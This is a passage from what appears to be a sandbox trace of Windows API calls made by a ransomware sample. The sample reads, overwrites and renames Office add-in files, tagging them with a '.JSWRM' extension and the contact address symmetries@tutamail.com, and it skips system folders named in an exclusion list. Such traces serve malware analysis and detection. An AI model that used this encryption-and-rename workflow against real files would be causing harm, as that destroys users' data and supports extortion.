lpWideCharStr="9A8I36E") returned 8 [0126.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0126.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0126.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0126.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0126.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.109] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\sql2000.xsl" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\sql2000.xsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\sql2000.xsl.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\sql2000.xsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.109] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0126.109] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0126.110] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0126.110] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x167a9331, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7e02, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="sql70.xsl", cAlternateFileName="")) returned 1 [0126.110] lstrcmpiW (lpString1="sql70.xsl", lpString2=".") returned 1 [0126.110] lstrcmpiW (lpString1="sql70.xsl", lpString2="..") returned 1 [0126.110] lstrcmpiW (lpString1="sql70.xsl", lpString2="...") returned 1 [0126.110] lstrcmpiW (lpString1="sql70.xsl", lpString2="windows") returned -1 [0126.110] lstrcmpiW (lpString1="sql70.xsl", lpString2="recovery") returned 1 [0126.110] lstrcmpiW (lpString1="sql70.xsl", lpString2="perflogs") returned 1 [0126.110] lstrcmpiW (lpString1="sql70.xsl", lpString2="documents and settings") returned 1 [0126.110] lstrcmpiW (lpString1="sql70.xsl", lpString2="$RECYCLE.BIN") returned 1 [0126.110] lstrcmpiW (lpString1="sql70.xsl", lpString2="system volume information") returned -1 [0126.110] lstrcmpiW (lpString1="sql70.xsl", lpString2="msocache") returned 1 [0126.110] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0126.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sql70.xsl", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0126.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sql70.xsl", cchWideChar=9, lpMultiByteStr=0x345e508, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sql70.xsl", lpUsedDefaultChar=0x0) returned 9 [0126.110] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0126.110] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0126.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sql70.xsl", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0126.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sql70.xsl", cchWideChar=9, lpMultiByteStr=0x345e4d8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sql70.xsl", lpUsedDefaultChar=0x0) returned 9 [0126.110] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0126.110] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0126.110] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0126.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.110] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0126.110] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\sql70.xsl" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\sql70.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0126.111] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=32258) returned 1 [0126.111] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7e00) returned 0x278330 [0126.111] ReadFile (in: hFile=0x338, lpBuffer=0x278330, nNumberOfBytesToRead=0x7e00, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e1cc*=0x7e00, lpOverlapped=0x0) returned 1 [0126.115] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.115] WriteFile (in: hFile=0x338, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x7e00, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e1c8*=0x7e00, lpOverlapped=0x0) returned 1 [0126.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x278330 | out: hHeap=0x1e0000) returned 1 [0126.115] CloseHandle (hObject=0x338) returned 1 [0126.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0126.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0126.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0126.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0126.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0126.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0126.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0126.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b2b0 [0126.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0126.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b2b0 | out: hHeap=0x1e0000) returned 1 [0126.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.115] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\sql70.xsl" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\sql70.xsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\sql70.xsl.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\sql70.xsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0126.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0126.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0126.116] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x16736b69, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x16736b69, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16783027, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x18559, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="sql90.xsl", cAlternateFileName="")) returned 1 [0126.116] lstrcmpiW (lpString1="sql90.xsl", lpString2=".") returned 1 [0126.116] lstrcmpiW (lpString1="sql90.xsl", lpString2="..") returned 1 [0126.116] lstrcmpiW (lpString1="sql90.xsl", lpString2="...") returned 1 [0126.117] lstrcmpiW (lpString1="sql90.xsl", lpString2="windows") returned -1 [0126.117] lstrcmpiW (lpString1="sql90.xsl", lpString2="recovery") returned 1 [0126.117] lstrcmpiW (lpString1="sql90.xsl", lpString2="perflogs") returned 1 [0126.117] lstrcmpiW (lpString1="sql90.xsl", lpString2="documents and settings") returned 1 [0126.117] lstrcmpiW (lpString1="sql90.xsl", lpString2="$RECYCLE.BIN") returned 1 [0126.117] lstrcmpiW (lpString1="sql90.xsl", lpString2="system volume information") returned -1 [0126.117] lstrcmpiW (lpString1="sql90.xsl", lpString2="msocache") returned 1 [0126.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0126.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sql90.xsl", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0126.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sql90.xsl", cchWideChar=9, lpMultiByteStr=0x345e508, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sql90.xsl", lpUsedDefaultChar=0x0) returned 9 [0126.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0126.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0126.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sql90.xsl", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0126.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sql90.xsl", cchWideChar=9, lpMultiByteStr=0x345e4d8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sql90.xsl", lpUsedDefaultChar=0x0) returned 9 [0126.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0126.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0126.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0126.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dd70 [0126.117] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\sql90.xsl" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\sql90.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0126.118] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=99673) returned 1 [0126.118] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x18550) returned 0x2501e8 [0126.118] ReadFile (in: hFile=0x338, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x18550, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e1cc*=0x18550, lpOverlapped=0x0) returned 1 [0126.182] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.182] WriteFile (in: hFile=0x338, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x18550, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e1c8*=0x18550, lpOverlapped=0x0) returned 1 [0126.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0126.183] CloseHandle (hObject=0x338) returned 1 [0126.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0126.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0126.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0126.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0126.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0126.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0126.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0126.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0126.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0126.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0126.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0126.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0126.183] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\sql90.xsl" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\sql90.xsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\sql90.xsl.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\sql90.xsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.185] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0126.185] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0126.185] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dd70 | out: hHeap=0x1e0000) returned 1 [0126.185] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x16677f4b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x16677f4b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x166ea6b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1393e, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="sqlpdw.xsl", cAlternateFileName="")) returned 1 [0126.185] lstrcmpiW (lpString1="sqlpdw.xsl", lpString2=".") returned 1 [0126.185] lstrcmpiW (lpString1="sqlpdw.xsl", lpString2="..") returned 1 [0126.185] lstrcmpiW (lpString1="sqlpdw.xsl", lpString2="...") returned 1 [0126.185] lstrcmpiW (lpString1="sqlpdw.xsl", lpString2="windows") returned -1 [0126.185] lstrcmpiW (lpString1="sqlpdw.xsl", lpString2="recovery") returned 1 [0126.185] lstrcmpiW (lpString1="sqlpdw.xsl", lpString2="perflogs") returned 1 [0126.185] lstrcmpiW (lpString1="sqlpdw.xsl", lpString2="documents and settings") returned 1 [0126.185] lstrcmpiW (lpString1="sqlpdw.xsl", lpString2="$RECYCLE.BIN") returned 1 [0126.185] lstrcmpiW (lpString1="sqlpdw.xsl", lpString2="system volume information") returned -1 [0126.185] lstrcmpiW (lpString1="sqlpdw.xsl", lpString2="msocache") returned 1 [0126.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0126.186] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sqlpdw.xsl", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0126.186] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sqlpdw.xsl", cchWideChar=10, lpMultiByteStr=0x345e508, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sqlpdw.xsl", lpUsedDefaultChar=0x0) returned 10 [0126.186] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0126.186] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0126.186] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sqlpdw.xsl", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0126.186] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sqlpdw.xsl", cchWideChar=10, lpMultiByteStr=0x345e4d8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sqlpdw.xsl", lpUsedDefaultChar=0x0) returned 10 [0126.186] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0126.186] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dd70 [0126.186] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0126.186] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.186] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.186] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dff8 [0126.186] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\sqlpdw.xsl" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\sqlpdw.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0126.187] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=80190) returned 1 [0126.188] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x13930) returned 0x278330 [0126.188] ReadFile (in: hFile=0x338, lpBuffer=0x278330, nNumberOfBytesToRead=0x13930, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e1cc*=0x13930, lpOverlapped=0x0) returned 1 [0126.197] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.197] WriteFile (in: hFile=0x338, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x13930, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e1c8*=0x13930, lpOverlapped=0x0) returned 1 [0126.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x278330 | out: hHeap=0x1e0000) returned 1 [0126.197] CloseHandle (hObject=0x338) returned 1 [0126.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0126.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0126.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0126.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0126.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0126.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0126.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0126.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0126.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0126.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0126.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.197] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\sqlpdw.xsl" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\sqlpdw.xsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\sqlpdw.xsl.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\sqlpdw.xsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0126.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0126.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dff8 | out: hHeap=0x1e0000) returned 1 [0126.199] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, 